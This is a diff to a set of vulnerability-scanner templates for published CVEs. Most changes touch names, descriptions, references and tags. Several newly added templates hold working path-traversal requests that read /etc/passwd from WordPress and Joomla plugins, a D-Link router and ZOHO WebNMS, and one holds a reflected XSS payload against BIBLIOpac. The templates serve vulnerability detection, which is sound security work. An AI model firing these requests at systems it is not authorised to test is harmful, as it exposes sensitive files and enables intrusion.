+    - http://seclists.org/fulldisclosure/2015/Jul/44
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2014-8676
+    cwe-id: CWE-22
+  tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2014/CVE-2014-8799.yaml

@@ -8,7 +8,6 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
     - https://www.exploit-db.com/exploits/35346
-    - https://www.cvedetails.com/cve/CVE-2014-8799
     - https://wordpress.org/plugins/dukapress/changelog/
   classification:
     cve-id: CVE-2014-8799

cves/2014/CVE-2014-9094.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-9094
 
 info:
-  name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
+  name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.

cves/2014/CVE-2014-9444.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-9444
 
 info:
-  name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
+  name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
@@ -12,7 +12,7 @@ info:
     - http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/
   classification:
     cve-id: CVE-2014-9444
-  tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress
+  tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
 
 requests:
   - method: GET

cves/2015/CVE-2015-1579.yaml

@@ -17,7 +17,7 @@ info:
     cve-id: CVE-2015-1579
     cwe-id: CWE-22
   metadata:
-    google-dork: inurl:/wp-content/plugins/revslider
+    google-query: inurl:/wp-content/plugins/revslider
   tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
 
 requests:

cves/2015/CVE-2015-4074.yaml

@@ -0,0 +1,36 @@
+id: CVE-2015-4074
+
+info:
+  name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
+  reference:
+    - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
+    - https://www.exploit-db.com/exploits/37666/
+    - https://www.cvedetails.com/cve/CVE-2015-4074
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-4074
+    cwe-id: CWE-22
+  tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by cs on 2022/09/08

cves/2015/CVE-2015-4127.yaml

@@ -1,16 +1,16 @@
 id: CVE-2015-4127
 
 info:
-  name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
+  name: WordPress Church Admin <0.810 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: |
-    Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
+    WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
   reference:
     - https://www.exploit-db.com/exploits/37112
     - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
     - https://wordpress.org/plugins/church-admin/changelog/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
   classification:
     cve-id: CVE-2015-4127
   tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
@@ -35,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2015/CVE-2015-5469.yaml

@@ -0,0 +1,33 @@
+id: CVE-2015-5469
+info:
+  name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
+  author: 0x_Akoko
+  severity: high
+  description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
+  reference:
+    - https://www.openwall.com/lists/oss-security/2015/07/10/5
+    - https://www.cvedetails.com/cve/CVE-2015-5469/
+    - http://www.vapid.dhs.org/advisory.php?v=133
+    - http://www.openwall.com/lists/oss-security/2015/07/10/5
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-5469
+    cwe-id: CWE-22
+  tags: cve,cve2015,wp,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2015/CVE-2015-7245.yaml

@@ -0,0 +1,32 @@
+id: CVE-2015-7245
+
+info:
+  name: D-Link DVG-N5402SP - Path Traversal
+  author: 0x_Akoko
+  severity: high
+  description: |
+    Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+  reference:
+    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+    - https://www.exploit-db.com/exploits/39409/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-7245
+    cwe-id: CWE-22
+  tags: cve,cve2015,dlink,lfi,packetstorm,edb
+
+requests:
+  - raw:
+      - |
+        POST /cgibin/webproc HTTP/1.1
+        Host: {{Hostname}}
+
+        getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"

cves/2016/CVE-2016-1000141.yaml

@@ -1,7 +1,7 @@
 id: CVE-2016-1000141
 
 info:
-  name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
+  name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.

cves/2016/CVE-2016-2389.yaml

@@ -7,7 +7,6 @@ info:
   description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
   reference:
     - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
-    - https://www.cvedetails.com/cve/CVE-2016-2389
     - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
     - https://www.exploit-db.com/exploits/39837/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-2389

cves/2016/CVE-2016-3088.yaml

@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2016-3088
     cwe-id: CWE-20
-  tags: fileupload,kev,edb,cve,cve2016,apache,activemq
+  tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
 
 requests:
   - raw:

cves/2016/CVE-2016-6601.yaml

@@ -0,0 +1,32 @@
+id: CVE-2016-6601
+
+info:
+  name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
+  reference:
+    - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
+    - https://www.exploit-db.com/exploits/40229/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2016-6601
+    cwe-id: CWE-22
+  tags: edb,cve,cve2016,zoho,lfi,webnms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2017/CVE-2017-11629.yaml

@@ -1,15 +1,15 @@
 id: CVE-2017-11629
 
 info:
-  name: FineCms 5.0.10 - Cross Site Scripting
+  name: FineCMS <=5.0.10 - Cross-Site Scripting
   author: ritikchaddha
   severity: medium
   description: |
-    dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
+    FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
   reference:
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2017/CVE-2017-12615.yaml

@@ -19,7 +19,7 @@ info:
     cwe-id: CWE-434
   metadata:
     shodan-query: title:"Apache Tomcat"
-  tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache
+  tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
 
 requests:
   - method: PUT

cves/2017/CVE-2017-14651.yaml

@@ -1,7 +1,7 @@
 id: CVE-2017-14651
 
 info:
-  name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting
+  name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
   author: mass0ma
   severity: medium
   description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.

cves/2017/CVE-2017-15715.yaml

@@ -15,7 +15,7 @@ info:
     cvss-score: 8.1
     cve-id: CVE-2017-15715
     cwe-id: CWE-20
-  tags: apache,httpd,fileupload,vulhub,cve,cve2017
+  tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
 
 requests:
   - raw:

cves/2017/CVE-2017-5521.yaml

@@ -17,7 +17,7 @@ info:
     cvss-score: 8.1
     cve-id: CVE-2017-5521
     cwe-id: CWE-200
-  tags: cve,cve2017,auth-bypass,netgear,router
+  tags: cve,cve2017,auth-bypass,netgear,router,kev
 
 requests:
   - method: GET

cves/2017/CVE-2017-6090.yaml

@@ -16,7 +16,7 @@ info:
     cwe-id: CWE-434
   metadata:
     shodan-query: http.title:"PhpCollab"
-  tags: cve2017,phpcollab,rce,fileupload,edb,cve
+  tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
 
 requests:
   - raw:

cves/2018/CVE-2018-11709.yaml

@@ -1,7 +1,7 @@
 id: CVE-2018-11709
 
 info:
-  name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting
+  name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.

cves/2018/CVE-2018-15961.yaml

@@ -17,7 +17,7 @@ info:
     cwe-id: CWE-434
   metadata:
     shodan-query: http.component:"Adobe ColdFusion"
-  tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev
+  tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
 
 requests:
   - raw:

cves/2018/CVE-2018-16139.yaml

@@ -0,0 +1,42 @@
+id: CVE-2018-16139
+
+info:
+  name: BIBLIOsoft BIBLIOpac 2008 - Cross Site Scripting
+  author: atomiczsec
+  severity: medium
+  description: |
+    Cross-site scripting (XSS) vulnerability in BIBLIOsoft BIBLIOpac 2008 allows remote attackers to inject arbitrary web script or HTML via the db or action parameter to to bin/wxis.exe/bibliopac/.
+  reference:
+    - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16139
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16139
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-16139
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    shodan-query: title:"Bibliopac"
+  tags: cve,cve2018,xss,bibliopac,bibliosoft
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>prompt(document.domain)</script>.xrf'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

cves/2018/CVE-2018-19386.yaml

@@ -1,14 +1,15 @@
 id: CVE-2018-19386
 
 info:
-  name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
+  name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
+  description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
   reference:
     - https://www.cvedetails.com/cve/CVE-2018-19386/
     - https://i.imgur.com/Y7t2AD6.png
     - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19386
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -29,3 +30,5 @@ requests:
       - type: word
         words:
           - '<a href="javascript:alert(document.domain)//'
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19439.yaml

@@ -1,14 +1,16 @@
 id: CVE-2018-19439
 
 info:
-  name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
+  name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
+  description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
   reference:
     - http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
-    - http://seclists.org/fulldisclosure/2018/Nov/58
     - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19439
+    - http://seclists.org/fulldisclosure/2018/Nov/58
+  remediation: Fixed in later versions including 5.4.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -25,3 +27,5 @@ requests:
         words:
           - "<script>alert(1337)</script><!--</TITLE>"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19749.yaml

@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
   reference:
     - https://github.com/domainmod/domainmod/issues/81
     - https://www.exploit-db.com/exploits/45941/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -49,3 +50,5 @@ requests:
           - 'contains(all_headers_3, "text/html")'
           - "contains(body_3, '><script>alert(document.domain)</script></a>')"
         condition: and
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19751.yaml

@@ -5,11 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
   reference:
     - https://www.exploit-db.com/exploits/45947/
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
     - https://github.com/domainmod/domainmod/issues/83
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -58,3 +58,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19752.yaml

@@ -5,11 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
+    DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
     - https://github.com/domainmod/domainmod/issues/84
     - https://www.exploit-db.com/exploits/45949/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -57,3 +57,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19877.yaml

@@ -1,14 +1,15 @@
 id: CVE-2018-19877
 
 info:
-  name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting
+  name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    Adiscon LogAnalyzer  before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
+    Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
   reference:
     - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
     - https://www.exploit-db.com/exploits/45958/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19877
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19892.yaml

@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
   reference:
     - https://www.exploit-db.com/exploits/45959
     - https://github.com/domainmod/domainmod/issues/85
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19892
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -56,3 +57,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19914.yaml

@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
   reference:
     - https://www.exploit-db.com/exploits/46375/
     - https://github.com/domainmod/domainmod/issues/87
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19914
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -49,3 +50,5 @@ requests:
           - 'contains(all_headers_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-20526.yaml

@@ -17,9 +17,9 @@ info:
     cve-id: CVE-2018-20526
     cwe-id: CWE-434
   metadata:
-    google-dork: intitle:"Roxy file manager"
+    google-query: intitle:"Roxy file manager"
     verified: "true"
-  tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb
+  tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
 
 requests:
   - raw:

cves/2018/CVE-2018-2628.yaml

@@ -16,7 +16,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-2628
     cwe-id: CWE-502
-  tags: cve,cve2018,oracle,weblogic,network,deserialization
+  tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
 
 network:
   - inputs:

cves/2018/CVE-2018-5715.yaml

@@ -16,7 +16,7 @@ info:
     cve-id: CVE-2018-5715
     cwe-id: CWE-79
   metadata:
-    google-dork: intext:"SugarCRM Inc. All Rights Reserved"
+    google-query: intext:"SugarCRM Inc. All Rights Reserved"
     shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
   tags: sugarcrm,xss,edb,cve,cve2018
 

cves/2019/CVE-2019-1010287.yaml

@@ -16,7 +16,7 @@ info:
     cve-id: CVE-2019-1010287
     cwe-id: CWE-79
   metadata:
-    google-dork: inurl:"/timesheet/login.php"
+    google-query: inurl:"/timesheet/login.php"
   tags: cve,cve2019,timesheet,xss
 
 requests:

cves/2019/CVE-2019-1010290.yaml

@@ -7,8 +7,8 @@ info:
   description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect  in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
   reference:
     - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
-    - https://www.cvedetails.com/cve/CVE-2019-1010290
     - http://dev.cmsmadesimple.org/project/files/729
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1

cves/2019/CVE-2019-12593.yaml

@@ -16,7 +16,7 @@ info:
     cve-id: CVE-2019-12593
     cwe-id: CWE-22
   metadata:
-    google-dork: Powered By IceWarp 10.4.4
+    google-query: Powered By IceWarp 10.4.4
     shodan-query: title:"icewarp"
   tags: cve,cve2019,lfi,icewarp
 

cves/2019/CVE-2019-14974.yaml

@@ -4,9 +4,10 @@ info:
   name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
+  description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
   reference:
     - https://www.exploit-db.com/exploits/47247
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14974
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -27,3 +28,5 @@ requests:
         words:
           - "url = window.location.search.split(\"?desktop_url=\")[1]"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-15501.yaml

@@ -1,14 +1,14 @@
 id: CVE-2019-15501
 
 info:
-  name: LSoft ListServ - XSS
+  name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
+  description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
   reference:
     - https://www.exploit-db.com/exploits/47302
     - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15501
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-15811.yaml

@@ -1,14 +1,15 @@
 id: CVE-2019-15811
 
 info:
-  name: DomainMOD 4.13.0 - Cross-Site Scripting
+  name: DomainMOD <=4.13.0 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters.
+    DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
   reference:
     - https://www.exploit-db.com/exploits/47325
     - https://github.com/domainmod/domainmod/issues/108
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15811
     - https://zerodays.lol/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -44,3 +45,5 @@ requests:
           - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
           - 'contains(body_2, "DomainMOD")'
         condition: and
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-15889.yaml

@@ -1,14 +1,14 @@
 id: CVE-2019-15889
 
 info:
-  name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
+  description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
     - https://www.cybersecurity-help.cz/vdb/SB2019041819
     - https://wordpress.org/plugins/download-manager/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15889
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-16332.yaml

@@ -1,13 +1,14 @@
 id: CVE-2019-16332
 
 info:
-  name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
+  description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
   reference:
     - https://plugins.trac.wordpress.org/changeset/2152730
     - https://wordpress.org/plugins/api-bearer-auth/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16332
   classification:
